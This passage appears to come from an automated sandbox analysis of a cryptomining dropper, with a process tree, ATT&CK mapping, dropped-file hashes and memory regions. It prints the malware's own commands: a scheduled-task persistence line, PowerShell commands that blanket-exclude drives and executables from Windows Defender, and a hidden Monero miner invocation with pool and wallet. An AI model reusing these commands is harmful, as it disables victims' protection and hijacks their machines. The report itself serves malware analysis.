        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1340
    - - C:\Windows\System32\cmd.exe
        
        "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
        5⤵
        
        PID:964
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:956
    - - C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c "C:\Windows\system32\services64.exe"
        5⤵
        Loads dropped DLL
        
        PID:2348
      - C:\Windows\system32\services64.exe
        
        C:\Windows\system32\services64.exe
        6⤵
        Executes dropped EXE
        
        PID:2740
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"
        7⤵
        Loads dropped DLL
        Drops file in System32 directory
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2304
        
        C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
        8⤵
        
        PID:2584
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        9⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2712
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        9⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2068
        
        C:\Windows\system32\Microsoft\Libs\sihost64.exe
        
        "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
        8⤵
        Executes dropped EXE
        
        PID:2376
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "/sihost64"
        9⤵
        
        PID:1480
        
        C:\Windows\System32\conhost.exe
        
        C:\Windows/System32\conhost.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:14444 --user=41zSmpNwAfHBxUh8HTq7Fsj2TXsGboB8GFeM8ek7xhc8QmL1TJCmoam94f57niQhKqiajN7KMWmAng1cNnMghXPi5bN3xNk.{COMPUTERNAME}/adwadw --pass= --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56GQTOYuXRCBeyb5NYlmdCuiwuvmEFRE3FUoytGa2xDRKVyTGVqBRZ3YvrseaWnYy0OhLuczKVxfo8Wo33kvDh26CIpmy6+bf50YCXxhpkDvay12RqWFwTrEWzJDjMOFSbV4qSudJZDKeejGmt2wAsK4zZ9lj0F0NMeagNs9oiluuddfhHuwfN3JDOsm7vnmpSFDvtwzZIXsZWyWN624JxJsSIqBQxfKrcCnHvRx/k2yLSlvxLvum+3cwztr7Zb0wO7EEWrafJMkNolCTGr1RQK9klv+u1q+LOMUOW+Y1mA+ZjeC+aSi9qmt59ZMlAX42foDzL1w8qyVjl6rfhEF/2bTP0YCyKockkTlSVngGY/1F1T5EOo9DhmrxyNy9y8mJqRKYUIcpgNI5Y4F/BBh3W0pw0+6w6pKB/o2s/ADQ0m7f1mIWwiXrj/GHg6M2kw4tg4mnBGVnha642JDqV8iaYphm4FpsNVwyEeLSXd18Mjr+kd9fvE08ohpB15bbg+6JPSeWISk8CHiep3TzEvyvZ+5XcHZVh1iXXZwlYO+wW5wxnobnzBzuj6f/BZ2txWK+7m4Cgd8mjMym7jJ/vKH1WIDSz05jpx4+wkdqzn3YIdvl2S8Luc4rG0CJXqJOdwbYOBrAey4VzJk8E8cY9tmMr5hpjLcfmu59CVDYVbbFFkb9usjHhXda167RDDOeCiLgdiepY0+9J4GWfDFBWRnvZEIn9njCW10s1hFXvQH+unnKdsaoBPNxSaPInK8O97Hj64jPqNG5qPd3DSjbVR1Cvuh9P29ZftnsNS50GnGtYvaNRBa6443D9MamN7WKSEjXwi5X466GHpLm7tClAm3T8zHW8BSKHq3yutkuduzGC2BYW5rxa17LYp4CzfKufpZJNPcoGIEVeut/xrvPPi+IYNCKrJPaDMN2ZJkpVGMqbuc5AF89xn8L6Lg1pYhaW8QjVZfQAkz7FVC8K667Gg6noLQpAyfd6lW36v4zbzg+fy82rNQmYSI3WMfiYNmvJM8DVc0772kBqEwUisr6ktdw4QlqXJe45Hvgu4yC2Rb6/ntnmOTLJz66c2h/wdUSvS18C67j6jsTvSh7k7avmCdG4sgS/BcyNsYOGIVjgNICoikSjNVrnFxCscaJerBnNPv197mrO4+rRF20+jzVnXKaNAmzbmoa4UjU13WSWasSDIT/lwH5kWp3uPfR1kinOL+sIQ==" --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth
        8⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2364

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\84d8043e-3701-4cd3-aaf7-74eac22b6538\AgileDotNetRT64.dll

Filesize
3.1MB

MD5
4d8082b3de02f82db9a515e9dab5d2b6

SHA1
057a20ade70244601d0fe50f7011c95bae335ea5

SHA256
936b1537b6efcece032c05661238b06beefc61ff76e82b7c5d9fe558a9360a4c

SHA512
7b9153e9948e0f911fcb0b145678a56cac4abd948fa99e07c331760f02dce096cf3be7d2d8493cf7a76460c7172e24eaa45c1283a28353501b2876c54752c60d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Console.exe

Filesize
2.3MB

MD5
95287d0fce14802e21fa489e21be9863

SHA1
f8eb3feb3d8850e3877dc481a8b0c20e9f0d8724

SHA256
249bfd0a939f35cb04fb8a572c3b453830c45b274efe41735a5ee5b35c844b1d

SHA512
2a8a7d83fb8f9b99e51173f5923760286e8b76f911cf62d0517aa459ead7ceedaa510d66a82a203da9b9b0e927f7a3f8eb93580f863e47a0f996c7d9d08b449a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Java.exe

Filesize
2.1MB

MD5
960960ae22a975b17e7ffa714f24020a

SHA1
22c17a81e8ab3d5eab32e0e3cbf4f10883982892

SHA256
31c3fdc6eff26574cea919a4e3f17aeb7d3b6fe6214bd15532bf03c1d04e3298

SHA512
30f7c544fc4dc6a2e8792346f7c9a936c0b9a0d217f356ee86bc062f89bd163575ee905886afa40ab6e2aa30705c06e433bd193d8bdd4e387b0e867c0bbb6511

Download Submit
C:\Users\Admin\AppData\Local\Temp\launcher.exe

Filesize
6.1MB

MD5
07f81c14f5b70e91fe66c75d5d0c24fb

SHA1
70ceea877ab27db62234129acd5eeddca9518d8a

SHA256
3e6267037189ed897dc92f49c4da6624ad1ee5e3967d3f3075411eee75a29674

SHA512
37105fd000bad88c0208ab43390dcc687546480bcebfd6454656007c9e715b88acf8e0842834423b4b0456c5d588e94a849730ddbddaf7bd68e0a53010ea9a19

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
76640c36016f5e5d6adb4ef2c0f7a6e6

SHA1
20a501f346e6739c79199ea53555431d8a1309ad

SHA256
bbd67dc61b66ef2cd3161d49b3bda63a848e6a6f983e07f62a76f1c62006089a

SHA512
19dbbc0d7793384635c86eab0f43606c6d10e3e9d54764047cd578c32c3a8c348b93ed48c8ca26cae19f85506f28654b22a3c2f83a7d3a5952f4421300af7cd9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
13a84ea4614b90a6d230161b484e16a2

SHA1
e45407abd3ea1b0f6c3f7e1103accd1b5b6617c1

SHA256
55ee291f39e5b35306dbe29801a0a84acf01514b6188bb076d35cbbfeb14d06a

SHA512
d9936a60ce0ed55a6c9e43a63a9d211d30ec10f9c62477b3ce88f3978a460960a8171b7bfa79e7745378cc33d48797c3964eeef00ff074149fadc1b8c0a27ff1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6YKLKUP438XX5CPNVKCI.temp

Filesize
7KB

MD5
d0f947a70cfc2879e2a0374f97c79bd8

SHA1
4a05973c196d75733eaa95d55ce39561882a37ef

SHA256
c8b42bd9d4fcb7c812726fcd8a9ec95e1df5c5b59fa61a5c4d7a9647cb83f6ab

SHA512
4fb4729351d9758a8d577dbfd4786c657ada047120c2f44314175079bc4ba152c2eabaa85c432319a1775cf0e3fef37aa884ce0e3688150b9da29c5a31aeb3a5

Download Submit
C:\Windows\RuntimeBroker.exe

Filesize
404KB

MD5
595e541cc53c1b909e395c2ebb3032b4

SHA1
3e61bb6b58b66c3dfce9b4ca74dfc38fb76c7d5b

SHA256
bcabe497dad3783de483b65e39107f3d169be4b687335b830f81b629f41c588f

SHA512
d273e73d974ff8dabb84426c794f46d42abeb5b8a5f32aeec9478163c29a12122352cbfd763f9b671d7f2d3ac0f1286eda1f31478a46f6e73cfe28b24fc7c793

Download Submit
C:\Windows\System32\Microsoft\Telemetry\sihost32.exe

Filesize
79KB

MD5
4ce9626c05b0420611f3c13cdffb932a

SHA1
0b9b5d15830e6fe4709ec182ee4bb9f047375db9

SHA256
d556bc8076ec3ed9175d9bc3d34e0cc2937f90082a71ecb726721d81050a51c8

SHA512
f9c878ebef4b42310ed4a60b8d7bb9148d05ef89ed7d59eec38804d3d1b4c5f4a750ad4af82fc4db1819c96092cd2cbe37e90b83783b616b8953d382065592e1

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Windows\System32\Microsoft\Libs\sihost64.exe

Filesize
78KB

MD5
3a50e9d8b7ce768f0657ab18b4550b0b

SHA1
cbab3928f2f3f39259156899847deaba16fef8b1

SHA256
1ac2515f2992566071cdb2182958c7f345681a303284dfe8721d4309e398c12a

SHA512
25fca998556b769d4f55cb473c13248179f297131d74d71be43676b2e2de50897ab3624ac7049b57928a7e0d159c8dd4b5742ce350a470e46d6288cc7ca65813

Download Submit
memory/304-74-0x000000001B740000-0x000000001BA22000-memory.dmp

Filesize
2.9MB

Download
memory/304-75-0x0000000001DE0000-0x0000000001DE8000-memory.dmp

Filesize
32KB

Download
memory/1340-83-0x00000000027E0000-0x00000000027E8000-memory.dmp

Filesize
32KB

Download
memory/1340-82-0x000000001B8A0000-0x000000001BB82000-memory.dmp

Filesize
2.9MB

Download
memory/1480-177-0x0000000000200000-0x0000000000214000-memory.dmp

Filesize
80KB

Download
memory/1480-175-0x0000000000060000-0x0000000000072000-memory.dmp

Filesize
72KB

Download
memory/1480-178-0x0000000000360000-0x0000000000366000-memory.dmp

Filesize
24KB

Download
memory/1496-174-0x0000000001CA0000-0x0000000001CB4000-memory.dmp

Filesize
80KB

Download
memory/1496-176-0x0000000001CD0000-0x0000000001CD6000-memory.dmp

Filesize
24KB

Download
memory/1496-173-0x0000000000060000-0x0000000000072000-memory.dmp

Filesize
72KB

Download
memory/1568-58-0x00000000001C0000-0x0000000000401000-memory.dmp

Filesize
2.3MB

Download
memory/1568-60-0x000000001B550000-0x000000001B792000-memory.dmp

Filesize
2.3MB

Download
memory/1568-63-0x000000001B310000-0x000000001B53A000-memory.dmp

Filesize
2.2MB

Download
memory/1960-62-0x000000001B310000-0x000000001B50A000-memory.dmp

Filesize
2.0MB

Download
memory/1960-61-0x000000001B520000-0x000000001B732000-memory.dmp

Filesize
2.1MB

Download
memory/1960-59-0x0000000000260000-0x0000000000472000-memory.dmp

Filesize
2.1MB

Download
memory/2272-6-0x0000000000EDF000-0x00000000011A3000-memory.dmp

Filesize
2.8MB

Download
memory/2272-0-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/2272-49-0x0000000000400000-0x0000000002107000-memory.dmp

Filesize
29.0MB

Download
memory/2272-12-0x0000000000EDF000-0x00000000011A3000-memory.dmp

Filesize
2.8MB

Download
memory/2272-4-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/2272-2-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/2272-7-0x0000000000400000-0x0000000002107000-memory.dmp

Filesize
29.0MB

Download
memory/2364-162-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2364-137-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2364-141-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2364-153-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2364-158-0x00000000000E0000-0x0000000000100000-memory.dmp

Filesize
128KB

Download
memory/2364-157-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2364-156-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2364-166-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2364-165-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2364-164-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2364-163-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2364-133-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2364-171-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2364-155-0x000007FFFFFDC000-0x000007FFFFFDD000-memory.dmp

Filesize
4KB

Download
memory/2364-151-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2364-149-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2364-147-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2364-145-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2364-143-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2364-139-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2364-135-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2364-131-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2636-89-0x000007FEF2600000-0x000007FEF2E6C000-memory.dmp

Filesize
8.4MB

Download
memory/2636-50-0x000007FEF2600000-0x000007FEF2E6C000-memory.dmp

Filesize
8.4MB

Download
memory/2636-42-0x000007FEF3AB0000-0x000007FEF3BDC000-memory.dmp

Filesize
1.2MB

Download
memory/2636-41-0x000007FEF2600000-0x000007FEF2E6C000-memory.dmp

Filesize
8.4MB

Download
memory/2636-40-0x000007FEF2600000-0x000007FEF2E6C000-memory.dmp

Filesize
8.4MB

Download
memory/2636-33-0x00000000008A0000-0x0000000000EBA000-memory.dmp

Filesize
6.1MB

Download